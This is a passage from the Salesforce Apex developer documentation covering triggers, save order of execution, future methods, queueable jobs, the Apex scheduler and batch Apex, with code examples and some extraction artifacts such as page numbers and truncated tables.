[select product2.color__c from pricebookentry
where id in :pbeIds]);
// Now use the map to set the appropriate color on every OpportunityLineItem processed
// by the trigger.
for (OpportunityLineItem oli : Trigger.new)
oli.color__c = entries.get(oli.pricebookEntryId).product2.color__c;
}
202
Invoking Apex
Defining Triggers
Defining Triggers
Trigger code is stored as metadata under the object with which they are associated. To define a trigger in Salesforce:
1. For a standard object, from Setup, click Customize, click the name of the object, then click Triggers.
For a custom object, from Setup, click Create > Objects and click the name of the object.
For campaign members, from Setup, click Customize > Campaigns > Campaign Member > Triggers.
For case comments, from Setup, click Customize > Cases > Case Comments > Triggers.
For email messages, from Setup, click Customize > Cases > Email Messages > Triggers.
For comments on ideas, from Setup, click Customize > Ideas > Idea Comments > Triggers.
For the Attachment, ContentDocument, and Note standard objects, you cant create a trigger in the Salesforce user interface. For
these objects, create a trigger using development tools, such as the Developer Console or the Force.com IDE. Alternatively, you can
also use the Metadata API.
2. In the Triggers related list, click New.
3. Click Version Settings to specify the version of Apex and the API used with this trigger. If your organization has installed managed
packages from the AppExchange, you can also specify which version of each managed package to use with this trigger. Use the
default values for all versions. This associates the trigger with the most recent version of Apex and the API, as well as each managed
package. You can specify an older version of a managed package if you want to access components or functionality that differs from
the most recent package version.
4. Click Apex Trigger and select the Is Active checkbox if the trigger should be compiled and enabled. Leave this checkbox
deselected if you only want to store the code in your organization's metadata. This checkbox is selected by default.
5. In the Body text box, enter the Apex for the trigger. A single trigger can be up to 1 million characters in length.
To define a trigger, use the following syntax:
trigger triggerName on ObjectName (trigger_events) {
code_block
}
where trigger_events can be a comma-separated list of one or more of the following events:
before insert
before update
before delete
after insert
after update
after delete
after undelete
Note:
You can only use the webService keyword in a trigger when it is in a method defined as asynchronous; that is, when
the method is defined with the @future keyword.
A trigger invoked by an insert, delete, or update of a recurring event or recurring task results in a runtime error
when the trigger is called in bulk from the Force.com API.
6. Click Save.
203
Invoking Apex
Note: Triggers are stored with an isValid flag that is set to true as long as dependent metadata has not changed since
the trigger was last compiled. If any changes are made to object names or fields that are used in the trigger, including superficial
changes such as edits to an object or field description, the isValid flag is set to false until the Apex compiler reprocesses
the code. Recompiling occurs when the trigger is next executed, or when a user re-saves the trigger in metadata.
If a lookup field references a record that has been deleted, Salesforce clears the value of the lookup field by default. Alternatively,
you can choose to prevent records from being deleted if theyre in a lookup relationship.
204
Invoking Apex
losing a merge operation, its MasterRecordId field is set to the ID of the winning record. The MasterRecordId field is
only set in after delete trigger events. If your application requires special handling for deleted records that occur as a result
of a merge, you need to use the after delete trigger event.
Update of the winning record
A single merge operation fires a single update event for the winning record only. Any child records that are reparented as a result
of the merge operation do not fire triggers.
For example, if two contacts are merged, only the delete and update contact triggers fire. No triggers for records related to the contacts,
such as accounts or opportunities, fire.
The following is the order of events when a merge occurs:
1. The before delete trigger fires.
2. The system deletes the necessary records due to the merge, assigns new parent records to the child records, and sets the
MasterRecordId field on the deleted records.
3. The after delete trigger fires.
4. The system does the specific updates required for the master record. Normal update triggers apply.
205
Invoking Apex
Note: Before Salesforce executes these events on the server, the browser runs JavaScript validation if the record contains any
dependent picklist fields. The validation limits each dependent picklist field to its available values. No other validation occurs on
the client side.
On the server, Salesforce:
1. Loads the original record from the database or initializes the record for an upsert statement.
2. Loads the new record field values from the request and overwrites the old values.
If the request came from a standard UI edit page, Salesforce runs system validation to check the record for:
Compliance with layout-specific rules
Required values at the layout level and field-definition level
Valid field formats
Maximum field length
Salesforce doesn't perform system validation in this step when the request comes from other sources, such as an Apex application
or a SOAP API call.
Salesforce runs user-defined validation rules if multiline items were created, such as quote line items and opportunity line items.
3. Executes all before triggers.
4. Runs most system validation steps again, such as verifying that all required fields have a non-null value, and runs any user-defined
validation rules. The only system validation that Salesforce doesn't run a second time (when the request comes from a standard UI
edit page) is the enforcement of layout-specific rules.
5. Executes duplicate rules, which is currently available as a beta feature. If the duplicate rule identifies the record as a duplicate and
uses the block action, the record is not saved and no further steps, such as after triggers and workflow rules, are taken.
6. Saves the record to the database, but doesn't commit yet.
7. Executes all after triggers.
8. Executes assignment rules.
9. Executes auto-response rules.
10. Executes workflow rules.
11. If there are workflow field updates, updates the record again.
12. If workflow field updates introduced new duplicate field values, executes duplicate rules again.
13. If the record was updated with workflow field updates, fires before update triggers and after update triggers one more
time (and only one more time), in addition to standard validations. Custom validation rules are not run again.
14. Executes processes.
Processes are currently available through a private beta program. For information on enabling this feature in your organization,
contact Salesforce.
If there are workflow flow triggers, executes the flows.
Flow trigger workflow actions, formerly available in a pilot program, have been superseded by the Process Builder. Organizations
that are using flow trigger workflow actions may continue to create and edit them, but flow trigger workflow actions arent available
for new organizations. For information on enabling the Process Builder (beta) in your organization, contact Salesforce.
15. Executes escalation rules.
16. Executes entitlement rules.
206
Invoking Apex
17. If the record contains a roll-up summary field or is part of a cross-object workflow, performs calculations and updates the roll-up
summary field in the parent record. Parent record goes through save procedure.
18. If the parent record is updated, and a grandparent record contains a roll-up summary field or is part of a cross-object workflow,
performs calculations and updates the roll-up summary field in the grandparent record. Grandparent record goes through save
procedure.
19. Executes Criteria Based Sharing evaluation.
20. Commits all DML operations to the database.
21. Executes post-commit logic, such as sending email.
Note: During a recursive save, Salesforce skips steps 8 (assignment rules) through 18 (roll-up summary field in the grandparent
record).
Additional Considerations
Please note the following when working with triggers.
The order of execution isnt guaranteed when having multiple triggers for the same object due to the same event. For example, if
you have two before insert triggers for Case, and a new Case record is inserted that fires the two triggers, the order in which these
triggers fire isnt guaranteed.
When a DML call is made with partial success allowed, up to three attempts can be made to save the records. Triggers are fired
during the first attempt and are re-fired during subsequent attempts. DML calls allow partial success when you set the allOrNone
parameter of a Database DML method to false or when you call the SOAP API with default settings. For more details, see Bulk
DML Exception Handling.
When Enable Validation and Triggers from Lead Convert is selected, if the lead conversion creates an
opportunity and the opportunity has Apex before triggers associated with it, the triggers run immediately after the opportunity is
created, before the opportunity contact role is created. For more information, see Customizing Lead Settings in the Salesforce
online help.
If you are using before triggers to set Stage and Forecast Category for an opportunity record, the behavior is as follows:
If you set Stage and Forecast Category, the opportunity record contains those exact values.
If you set Stage but not Forecast Category, the Forecast Category value on the opportunity record defaults
to the one associated with trigger Stage.
If you reset Stage to a value specified in an API call or incoming from the user interface, the Forecast Category value
should also come from the API call or user interface. If no value for Forecast Category is specified and the incoming
Stage is different than the trigger Stage, the Forecast Category defaults to the one associated with trigger Stage.
If the trigger Stage and incoming Stage are the same, the Forecast Category is not defaulted.
If you are cloning an opportunity with products, the following events occur in order:
1. The parent opportunity is saved according to the list of events shown above.
2. The opportunity products are saved according to the list of events shown above.
Note: If errors occur on an opportunity product, you must return to the opportunity and fix the errors before cloning. sIf any
opportunity products contain unique custom fields, you must null them out before cloning the opportunity.
Trigger.old contains a version of the objects before the specific update that fired the trigger. However, there is an exception.
When a record is updated and subsequently triggers a workflow rule field update, Trigger.old in the last update trigger wont
contain the version of the object immediately prior to the workflow update, but the object before the initial update was made. For
example, suppose an existing record has a number field with an initial value of 1. A user updates this field to 10, and a workflow rule
207
Invoking Apex
field update fires and increments it to 11. In the update trigger that fires after the workflow field update, the field value of the object
obtained from Trigger.old is the original value of 1, rather than 10, as would typically be the case.
208
Invoking Apex
You can't use before or after delete triggers with the ContentVersion object.
209
Invoking Apex
210
Invoking Apex
Trigger Exceptions
Apex code uses additional security when executing in a Chatter context. To post to a private group, the user running the code must
be a member of that group. If the running user isn't a member, you can set the CreatedById field to be a member of the group
in the FeedItem record.
Note the following for the CollaborationGroup and CollaborationGroupMember objects:
When CollaborationGroupMember is updated, CollaborationGroup is automatically updated as well to ensure that the member
count is correct. As a result, when CollaborationGroupMember update or delete triggers run, CollaborationGroup update
triggers run as well.
Trigger Exceptions
Triggers can be used to prevent DML operations from occurring by calling the addError() method on a record or field. When used
on Trigger.new records in insert and update triggers, and on Trigger.old records in delete triggers, the custom
error message is displayed in the application interface and logged.
Note: Users experience less of a delay in response time if errors are added to before triggers.
A subset of the records being processed can be marked with the addError() method:
If the trigger was spawned by a DML statement in Apex, any one error results in the entire operation rolling back. However, the
runtime engine still processes every record in the operation to compile a comprehensive list of errors.
If the trigger was spawned by a bulk DML call in the Force.com API, the runtime engine sets aside the bad records and attempts to
do a partial save of the records that did not generate errors. See Bulk DML Exception Handling on page 129.
If a trigger ever throws an unhandled exception, all records are marked with an error and no further processing takes place.
SEE ALSO:
addError(String)
field.addError(String)
This is another example of a flawed programming pattern. It assumes that less than 100 records are pulled in during a trigger invocation.
If more than 20 records are pulled into this request, the trigger would exceed the SOQL query limit of 100 SELECT statements:
trigger MileageTrigger on Mileage__c (before insert, before update) {
for(mileage__c m : Trigger.new){
User c = [SELECT Id FROM user WHERE mileageid__c = m.Id];
}
}
For more information on governor limits, see Understanding Execution Governors and Limits on page 258.
211
Invoking Apex
Asynchronous Apex
This example demonstrates the correct pattern to support the bulk nature of triggers while respecting the governor limits:
Trigger MileageTrigger on Mileage__c (before insert, before update) {
Set<ID> ids = Trigger.newMap.keySet();
List<User> c = [SELECT Id FROM user WHERE mileageid__c in :ids];
}
This pattern respects the bulk nature of the trigger by passing the Trigger.new collection to a set, then using the set in a single
SOQL query. This pattern captures all incoming records within the request while limiting the number of SOQL queries.
Asynchronous Apex
Future Methods
A future method runs in the background, asynchronously. You can call a future method for executing long-running operations, such as
callouts to external Web services or any operation youd like to run in its own thread, on its own time. You can also make use of future
methods to isolate DML operations on different sObject types to prevent the mixed DML error. Each future method is queued and
executes when system resources become available. That way, the execution of your code doesnt have to wait for the completion of a
long-running operation. A benefit of using future methods is that some governor limits are higher, such as SOQL query limits and heap
size limits.
To define a future method, simply annotate it with the future annotation, as follows.
global class FutureClass
{
@future
public static void myFutureMethod()
{
// Perform some operations
}
}
Methods with the future annotation must be static methods, and can only return a void type. The specified parameters must be
primitive data types, arrays of primitive data types, or collections of primitive data types. Methods with the future annotation cannot
take sObjects or objects as arguments.
The reason why sObjects cant be passed as arguments to future methods is because the sObject might change between the time you
call the method and the time it executes. In this case, the future method will get the old sObject values and might overwrite them. To
212
Invoking Apex
Future Methods
work with sObjects that already exist in the database, pass the sObject ID instead (or collection of IDs) and use the ID to perform a query
for the most up-to-date record. The following example shows how to do so with a list of IDs.
global class FutureMethodRecordProcessing
{
@future
public static void processRecords(List<ID> recordIds)
{
// Get those records based on the IDs
List<Account> accts = [SELECT Name FROM Account WHERE Id IN :recordIds];
// Process records
}
}
The following is a skeletal example of a future method that makes a callout to an external service. Notice that the annotation takes an
extra parameter (callout=true) to indicate that callouts are allowed. To learn more about callouts, see Invoking Callouts Using
Apex.
global class FutureMethodExample
{
@future(callout=true)
public static void getStockQuotes(String acctName)
{
// Perform a callout to an external service
}
}
Inserting a user with a non-null role must be done in a separate thread from DML operations on other sObjects. This example uses a
future method to achieve this. The future method, insertUserWithRole, which is defined in the Util class, performs the
insertion of a user with the COO role. This future method requires the COO role to be defined in the organization. The
useFutureMethod method in MixedDMLFuture inserts an account and calls the future method, insertUserWithRole.
This is the definition of the Util class, which contains the future method for inserting a user with a non-null role.
public class Util {
@future
public static void insertUserWithRole(
String uname, String al, String em, String lname) {
Profile p = [SELECT Id FROM Profile WHERE Name='Standard User'];
UserRole r = [SELECT Id FROM UserRole WHERE Name='COO'];
// Create new user with a non-null user role ID
User u = new User(alias = al, email=em,
emailencodingkey='UTF-8', lastname=lname,
languagelocalekey='en_US',
localesidkey='en_US', profileid = p.Id, userroleid = r.Id,
timezonesidkey='America/Los_Angeles',
username=uname);
insert u;
}
}
213
Invoking Apex
Future Methods
This is the class containing the main method that calls the future method defined previously.
public class MixedDMLFuture {
public static void useFutureMethod() {
// First DML operation
Account a = new Account(Name='Acme');
insert a;
// This next operation (insert a user with a role)
// can't be mixed with the previous insert unless
// it is within a future method.
// Call future method to insert a user with a role.
Util.insertUserWithRole(
'[email protected]', 'mruiz',
'[email protected]', 'Ruiz');
}
}
You can invoke future methods the same way you invoke any other method. However, a future method cant invoke another future
method.
Methods with the future annotation have the following limits:
No more than 50 method calls per Apex invocation
Note: Asynchronous calls, such as @future or executeBatch, called in a startTest, stopTest block, do not
count against your limits for the number of queued jobs.
The maximum number of future method invocations per a 24-hour period is 250,000 or the number of user licenses in your
organization multiplied by 200, whichever is greater. This is an organization-wide limit and is shared with all other asynchronous
Apex: batch Apex, scheduled Apex, and queueable Apex. The licenses that count toward this limit are full Salesforce user licenses
and Force.com App Subscription user licenses. Chatter Free, Chatter customer users, Customer Portal User, and partner portal User
licenses arent included.
Note: Future method jobs queued before a Salesforce service maintenance downtime remain in the queue. After service downtime
ends and when system resources become available, the queued future method jobs are executed. If a future method was running
when downtime occurred, the future method execution is rolled back and restarted after the service comes back up.
214
Invoking Apex
}
// The future method will run after Test.stopTest();
// Verify account is inserted
Account[] accts = [SELECT Id from Account WHERE Name='Acme'];
System.assertEquals(1, accts.size());
// Verify user is inserted
User[] users = [SELECT Id from User where username='[email protected]'];
System.assertEquals(1, users.size());
}
}
The higher limit is specified in the method definition as part of the @future annotation by using the limit parameter, in the
following syntax:
@future(limits='2x|3xlimitName')
For example, to double the amount of heap size that is allowed in your future method, define your method as follows:
@future(limits='2xHeap')
public static void myFutureMethod() {
// Your code here
}
Tip: Keep in mind that you can specify only one higher limit per future method. Decide which of the modifiable limits you need
the most for your method.
The following limit modifiers are supported. The string value passed to the limits parameter inside the annotation is case-insensitive.
215
Invoking Apex
Queueable Apex
Modifier
Description
@future(limits='2xHeap')
@future(limits='3xHeap')
@future(limits='2xCPU')
@future(limits='3xCPU')
@future(limits='2xSOQL')
@future(limits='3xSOQL')
@future(limits='2xDML')
@future(limits='3xDML')
@future(limits='2xDMLRows')
@future(limits='3xDMLRows')
Queueable Apex
Take control of your asynchronous Apex processes by using the Queueable interface. This interface enables you to add jobs to the
queue and monitor them, which is an enhanced way of running your asynchronous Apex code compared to using future methods.
For Apex processes that run for a long time, such as extensive database operations or external Web service callouts, you can run them
asynchronously by implementing the Queueable interface and adding a job to the Apex job queue. In this way, your asynchronous
Apex job runs in the background in its own thread and doesnt delay the execution of your main Apex logic. Each queued job runs when
system resources become available. A benefit of using the Queueable interface methods is that some governor limits are higher
than for synchronous Apex, such as heap size limits.
Queueable jobs are similar to future methods in that theyre both queued for execution, but they provide you with these additional
benefits.
Getting an ID for your job: When you submit your job by invoking the System.enqueueJob method, the method returns the
ID of the new job. This ID corresponds to the ID of the AsyncApexJob record. You can use this ID to identify your job and monitor
its progress, either through the Salesforce user interface in the Apex Jobs page, or programmatically by querying your record from
AsyncApexJob.
Chaining jobs: You can chain one job to another by starting a second job from a running job. Chaining jobs is useful if you need to
do some processing that depends on another process to have run first.
Example
This example is an implementation of the Queueable interface. The execute method in this example inserts a new account.
public class AsyncExecutionExample implements Queueable {
public void execute(QueueableContext context) {
Account a = new Account(Name='Acme',Phone='(415) 555-1212');
216
Invoking Apex
Queueable Apex
insert a;
}
}
After you submit your queueable class for execution, the job is added to the queue and will be processed when system resources become
available. You can monitor the status of your job programmatically by querying AsyncApexJob or through the user interface in Setup
by clicking Jobs > Apex Jobs.
To query information about your submitted job, perform a SOQL query on AsyncApexJob by filtering on the job ID that the
System.enqueueJob method returns. This example uses the jobID variable that was obtained in the previous example.
AsyncApexJob jobInfo = [SELECT Status,NumberOfErrors FROM AsyncApexJob WHERE Id=:jobID];
Similar to future jobs, queueable jobs dont process batches, and so the number of processed batches and the number of total batches
are always zero.
Note: The ID of a queueable Apex job isnt returned in test contextSystem.enqueueJob returns null in a running test.
Chaining Jobs
If you need to run a job after some other processing is done first by another job, you can chain queueable jobs. The maximum number
of jobs in the chain (maximum stack depth) is two, which means that you can link a job only once. To chain a job to another, submit the
second job from the execute() method of your queueable class. You can add only one job from an executing job. For example, if
217
Invoking Apex
Apex Scheduler
you have a second class called SecondJob that implements the Queueable interface, you can add this class to the queue in the
execute() method as follows:
public class AsyncExecutionExample implements Queueable {
public void execute(QueueableContext context) {
// Your processing logic here
// Chain this job to next job by submitting the next job
System.enqueueJob(new SecondJob());
}
}
You cant chain queueable jobs in an Apex test. Doing so results in an error. To avoid getting an error, you can check if Apex is running
in test context by calling Test.isRunningTest() before chaining jobs.
Apex Scheduler
To invoke Apex classes to run at specific times, first implement the Schedulable interface for the class, then specify the schedule
using either the Schedule Apex page in the Salesforce user interface, or the System.schedule method.
Important: Salesforce schedules the class for execution at the specified time. Actual execution may be delayed based on service
availability.
You can only have 100 scheduled Apex jobs at one time. You can evaluate your current count by viewing the Scheduled Jobs
page in Salesforce and creating a custom view with a type filter equal to Scheduled Apex. You can also programmatically query
the CronTrigger and CronJobDetail objects to get the count of Apex scheduled jobs.
Use extreme care if youre planning to schedule a class from a trigger. You must be able to guarantee that the trigger wont add
more scheduled classes than the 100 that are allowed. In particular, consider API bulk updates, import wizards, mass record changes
through the user interface, and all cases where more than one record can be updated at a time.
You cannot update an Apex class through the Salesforce user interface if there are one or more active scheduled jobs for that class.
However, you can enable deployments to update the class with active scheduled jobs by using the Metadata API (for example,
when using the Force.com IDE). See Deployment Connections and Options in the Salesforce Help.
218
Invoking Apex
Apex Scheduler
The scheduler runs as systemall classes are executed, whether or not the user has permission to execute the class.
To monitor or stop the execution of a scheduled Apex job using the Salesforce user interface, from Setup, click Monitoring > Scheduled
Jobs or Jobs > Scheduled Jobs.
The Schedulable interface contains one method that must be implemented, execute.
global void execute(SchedulableContext sc){}
The following example uses the System.Schedule method to implement the above class.
scheduledMerge m = new scheduledMerge();
String sch = '20 30 8 10 2 ?';
String jobID = system.schedule('Merge Job', sch, m);
You can also use the Schedulable interface with batch Apex classes. The following example implements the Schedulable
interface for a batch Apex class called batchable:
global class scheduledBatchable implements Schedulable {
global void execute(SchedulableContext sc) {
batchable b = new batchable();
database.executebatch(b);
}
}
An easier way to schedule a batch job is to call the System.scheduleBatch method without having to implement the
Schedulable interface.
Use the SchedulableContext object to keep track of the scheduled job once it's scheduled. The SchedulableContext getTriggerID
method returns the ID of the CronTrigger object associated with this scheduled job as a string. You can query CronTrigger to track
the progress of the scheduled job.
To stop execution of a job that was scheduled, use the System.abortJob method with the ID returned by the getTriggerID
method.
219
Invoking Apex
Apex Scheduler
The previous example assumes you have a jobID variable holding the ID of the job. The System.schedule method returns the
job ID. If youre performing this query inside the execute method of your schedulable class, you can obtain the ID of the current job
by calling getTriggerId on the SchedulableContext argument variable. Assuming this variable name is sc, the modified example
becomes:
CronTrigger ct =
[SELECT TimesTriggered, NextFireTime
FROM CronTrigger WHERE Id = :sc.getTriggerId()];
You can also get the jobs name and the jobs type from the CronJobDetail record associated with the CronTrigger record. To do so, use
the CronJobDetail relationship when performing a query on CronTrigger. This example retrieves the most recent CronTrigger
record with the job name and type from CronJobDetail.
CronTrigger job =
[SELECT Id, CronJobDetail.Id, CronJobDetail.Name, CronJobDetail.JobType
FROM CronTrigger ORDER BY CreatedDate DESC LIMIT 1];
Alternatively, you can query CronJobDetail directly to get the jobs name and type. This next example gets the jobs name and type for
the CronTrigger record queried in the previous example. The corresponding CronJobDetail record ID is obtained by the
CronJobDetail.Id expression on the CronTrigger record.
CronJobDetail ctd =
[SELECT Id, Name, JobType
FROM CronJobDetail WHERE Id = :job.CronJobDetail.Id];
To obtain the total count of all Apex scheduled jobs, excluding all other scheduled job types, perform the following query. Note the
value '7' is specified for the job type, which corresponds to the scheduled Apex job type.
SELECT COUNT() FROM CronTrigger WHERE CronJobDetail.JobType = '7'
220
Invoking Apex
Apex Scheduler
221
Invoking Apex
Apex Scheduler
System.assertEquals('testScheduledApexFromTestMethodUpdated',
[SELECT Id, Name FROM Account WHERE Id = :a.Id].Name);
}
}
Note: Salesforce schedules the class for execution at the specified time. Actual execution may be delayed based on service
availability.
The System.Schedule method uses the user's timezone for the basis of all schedules.
The following are the values for the expression:
Name
Values
Special Characters
Seconds
059
None
Minutes
059
None
Hours
023
, - * /
Day_of_month
131
, - * ? / L W
Month
, - * /
JAN
FEB
MAR
APR
MAY
JUN
JUL
AUG
SEP
OCT
NOV
DEC
222
Invoking Apex
Apex Scheduler
Name
Values
Special Characters
Day_of_week
17 or the following:
, - * ? / L #
SUN
MON
TUE
WED
THU
FRI
SAT
optional_year
null or 19702099
, - * /
Description
Delimits values. For example, use JAN, MAR, APR to specify more than one month.
Specifies a range. For example, use JAN-MAR to specify more than one month.
Specifies all values. For example, if Month is specified as *, the job is scheduled for
every month.
Specifies increments. The number before the slash specifies when the intervals will
begin, and the number after the slash is the interval amount. For example, if you specify
1/5 for Day_of_month, the Apex class runs every fifth day of the month, starting
on the first of the month.
Specifies the end of a range (last). This is only available for Day_of_month and
Day_of_week. When used with Day of month, L always means the last day
of the month, such as January 31, February 28 for leap years, and so on. When used
with Day_of_week by itself, it always means 7 or SAT. When used with a
Day_of_week value, it means the last of that type of day in the month. For example,
if you specify 2L, you are specifying the last Monday of the month. Do not use a range
of values with L as the results might be unexpected.
Specifies the nearest weekday (Monday-Friday) of the given day. This is only available
for Day_of_month. For example, if you specify 20W, and the 20th is a Saturday,
the class runs on the 19th. If you specify 1W, and the first is a Saturday, the class does
not run in the previous month, but on the third, which is the following Monday.
Tip: Use the L and W together to specify the last weekday of the month.
223
Invoking Apex
Apex Scheduler
Special Character
Description
Description
0 0 13 * * ?
0 0 22 ? * 6L
0 0 10 ? * MON-FRI
0 0 20 * * ? 2010
In the following example, the class proschedule implements the Schedulable interface. The class is scheduled to run at 8 AM,
on the 13th of February.
proschedule p = new proschedule();
String sch = '0 0 8 13 2 ?';
system.schedule('One Time Pro', sch, p);
224
Invoking Apex
Batch Apex
Use extreme care if youre planning to schedule a class from a trigger. You must be able to guarantee that the trigger wont add
more scheduled classes than the 100 that are allowed. In particular, consider API bulk updates, import wizards, mass record changes
through the user interface, and all cases where more than one record can be updated at a time.
Though it's possible to do additional processing in the execute method, we recommend that all processing take place in a
separate class.
You can't use the getContent and getContentAsPDF PageReference methods in scheduled Apex.
Synchronous Web service callouts are not supported from scheduled Apex. To be able to make callouts, make an asynchronous
callout by placing the callout in a method annotated with @future(callout=true) and call this method from scheduled
Apex. However, if your scheduled Apex executes a batch job, callouts are supported from the batch class. See Using Batch Apex.
Apex jobs scheduled to run during a Salesforce service maintenance downtime will be scheduled to run after the service comes
back up, when system resources become available. If a scheduled Apex job was running when downtime occurred, the job is rolled
back and scheduled again after the service comes back up. Note that after major service upgrades, there might be longer delays
than usual for starting scheduled Apex jobs because of system usage spikes.
SEE ALSO:
Schedulable Interface
Batch Apex
A developer can now employ batch Apex to build complex, long-running processes on the Force.com platform. For example, a developer
could build an archiving solution that runs on a nightly basis, looking for records past a certain date and adding them to an archive. Or
a developer could build a data cleansing operation that goes through all Accounts and Opportunities on a nightly basis and updates
them if necessary, based on custom criteria.
Batch Apex is exposed as an interface that must be implemented by the developer. Batch jobs can be programmatically invoked at
runtime using Apex.
You can only have five queued or active batch jobs at one time. You can evaluate your current count by viewing the Scheduled Jobs
page in Salesforce or programmatically using SOAP API to query the AsyncapexJob object.
Warning: Use extreme care if you are planning to invoke a batch job from a trigger. You must be able to guarantee that the
trigger will not add more batch jobs than the five that are allowed. In particular, consider API bulk updates, import wizards, mass
record changes through the user interface, and all cases where more than one record can be updated at a time.
Batch jobs can also be programmatically scheduled to run at specific times using the Apex scheduler, or scheduled using the Schedule
Apex page in the Salesforce user interface. For more information on the Schedule Apex page, see Scheduling Apex in the Salesforce
online help.
The batch Apex interface is also used for Apex managed sharing recalculations.
For more information on batch jobs, continue to Using Batch Apex on page 225.
For more information on Apex managed sharing, see Understanding Apex Managed Sharing on page 173.
225
Invoking Apex
Batch Apex
The start method is called at the beginning of a batch Apex job. Use the start method to collect the records or objects to
be passed to the interface method execute. This method returns either a Database.QueryLocator object or an iterable
that contains the records or objects being passed into the job.
Use the Database.QueryLocator object when you are using a simple query (SELECT) to generate the scope of objects
used in the batch job. If you use a querylocator object, the governor limit for the total number of records retrieved by SOQL queries
is bypassed. For example, a batch Apex job for the Account object can return a QueryLocator for all account records (up to 50
million records) in an organization. Another example is a sharing recalculation for the Contact object that returns a QueryLocator
for all account records in an organization.
Use the iterable when you need to create a complex scope for the batch job. You can also use the iterable to create your own custom
process for iterating through the list.
Important: If you use an iterable, the governor limit for the total number of records retrieved by SOQL queries is still enforced.
execute method:
global void execute(Database.BatchableContext BC, list<P>){}
The execute method is called for each batch of records passed to the method. Use this method to do all required processing for
each chunk of data.
This method takes the following:
A reference to the Database.BatchableContext object.
A list of sObjects, such as List<sObject>, or a list of parameterized types. If you are using a Database.QueryLocator,
the returned list should be used.
Batches of records execute in the order they are received from the start method.
finish method
global void finish(Database.BatchableContext BC){}
The finish method is called after all batches are processed. Use this method to send confirmation emails or execute post-processing
operations.
Each execution of a batch Apex job is considered a discrete transaction. For example, a batch Apex job that contains 1,000 records and
is executed without the optional scope parameter from Database.executeBatch is considered five transactions of 200 records
each. The Apex governor limits are reset for each transaction. If the first transaction succeeds but the second fails, the database updates
made in the first transaction are not rolled back.
Using Database.BatchableContext
All of the methods in the Database.Batchable interface require a reference to a Database.BatchableContext object.
Use this object to track the progress of the batch job.
The following is the instance method with the Database.BatchableContext object:
226
Invoking Apex
Batch Apex
Name
Arguments
getJobID
Returns
Description
ID
The following example uses the Database.BatchableContext to query the AsyncApexJob associated with the batch job.
global void finish(Database.BatchableContext BC){
// Get the ID of the AsyncApexJob representing this batch job
// from Database.BatchableContext.
// Query the AsyncApexJob object to retrieve the current job's information.
AsyncApexJob a = [SELECT Id, Status, NumberOfErrors, JobItemsProcessed,
TotalJobItems, CreatedBy.Email
FROM AsyncApexJob WHERE Id =
:BC.getJobId()];
// Send an email to the Apex job's submitter notifying of job completion.
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
String[] toAddresses = new String[] {a.CreatedBy.Email};
mail.setToAddresses(toAddresses);
mail.setSubject('Apex Sharing Recalculation ' + a.Status);
mail.setPlainTextBody
('The batch Apex job processed ' + a.TotalJobItems +
' batches with '+ a.NumberOfErrors + ' failures.');
Messaging.sendEmail(new Messaging.SingleEmailMessage[] { mail });
}
final
final
final
final
String
String
String
String
Query;
Entity;
Field;
Value;
227
Invoking Apex
Batch Apex
s.put(Field,Value);
}
update scope;
}
global void finish(Database.BatchableContext BC){
}
}
228
Invoking Apex
Batch Apex
If the batch job limit has been reached, Database.executeBatch throws a LimitException and doesnt add the job
to the queue.
The Database.executeBatch method returns the ID of the AsyncApexJob object, which can then be used to track the progress
of the job. For example:
ID batchprocessid = Database.executeBatch(reassign);
AsyncApexJob aaj = [SELECT Id, Status, JobItemsProcessed, TotalJobItems, NumberOfErrors
FROM AsyncApexJob WHERE ID =: batchprocessid ];
229
Invoking Apex
Batch Apex
Status
Description
Holding 1
Job has been submitted and is held until system resources are
freed up.
Queued
Preparing
The start method of the job has been invoked. This status might
last a few minutes depending on the size of the batch of records.
Processing
Aborted
Completed
Failed
230
Invoking Apex
Batch Apex
For more information about CronTrigger, see CronTrigger in the Object Reference for Salesforce and Force.com.
Note: Some things to note about System.scheduleBatch:
When you call System.scheduleBatch, Salesforce schedules the job for execution at the specified time. Actual execution
might be delayed based on service availability.
The scheduler runs as systemall classes are executed, whether or not the user has permission to execute the class.
All scheduled Apex limits apply for batch jobs scheduled using System.scheduleBatch. After the batch job starts
executing, all batch job limits apply and the job no longer counts toward scheduled Apex limits.
After calling this method and before the batch job starts, you can use the returned scheduled job ID to abort the scheduled
job using the System.abortJob method.
231
Invoking Apex
Batch Apex
To exclude accounts that were deleted and that are still in the Recycle Bin, append isDeleted=false in the SOQL query WHERE
clause as shown in the query in this modified sample.
// Query for accounts that aren't in the Recycle Bin
String q = 'SELECT Industry FROM Account WHERE isDeleted=false LIMIT 10';
String e = 'Account';
String f = 'Industry';
String v = 'Consulting';
Id batchInstanceId = Database.executeBatch(new UpdateAccountFields(q,e,f,v), 5);
To exclude invoices that were deleted and that are still in the Recycle Bin, append isDeleted=false in the SOQL query WHERE
clause as shown in the query in this modified sample.
// Query for invoices that aren't in the Recycle Bin
String q =
'SELECT Description__c FROM Invoice_Statement__c WHERE isDeleted=false LIMIT 10';
String e = 'Invoice_Statement__c';
String f = 'Description__c';
String v = 'Updated description';
Id batchInstanceId = Database.executeBatch(new UpdateInvoiceFields(q,e,f,v), 5);
The following class uses batch Apex to reassign all accounts owned by a specific user to a different user.
global class OwnerReassignment implements Database.Batchable<sObject>{
String query;
String email;
Id toUserId;
Id fromUserId;
global Database.querylocator start(Database.BatchableContext BC){
return Database.getQueryLocator(query);}
global void execute(Database.BatchableContext BC, List<sObject> scope){
List<Account> accns = new List<Account>();
for(sObject s : scope){Account a = (Account)s;
if(a.OwnerId==fromUserId){
a.OwnerId=toUserId;
accns.add(a);
}
}
update accns;
}
global void finish(Database.BatchableContext BC){
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
mail.setToAddresses(new String[] {email});
mail.setReplyTo('[email protected]');
mail.setSenderDisplayName('Batch Processing');
mail.setSubject('Batch Process Completed');
mail.setPlainTextBody('Batch Process has completed');
Messaging.sendEmail(new Messaging.SingleEmailMessage[] { mail });
232
Invoking Apex
Batch Apex
}
}
Use the following to execute the OwnerReassignment class in the previous example:
OwnerReassignment reassign = new OwnerReassignment();
reassign.query = 'SELECT Id, Name, Ownerid FROM Account ' +
'WHERE ownerid=\'' + u.id + '\'';
reassign.email='[email protected]';
reassign.fromUserId = u;
reassign.toUserId = u2;
ID batchprocessid = Database.executeBatch(reassign);
This code calls the BatchDelete batch Apex class to delete old documents. The specified query selects documents to delete for all
documents that are in a specified folder and that are older than a specified date. Next, the sample invokes the batch job.
BatchDelete BDel = new BatchDelete();
Datetime d = Datetime.now();
d = d.addDays(-1);
// Replace this value with the folder ID that contains
// the documents to delete.
String folderId = '00lD000000116lD';
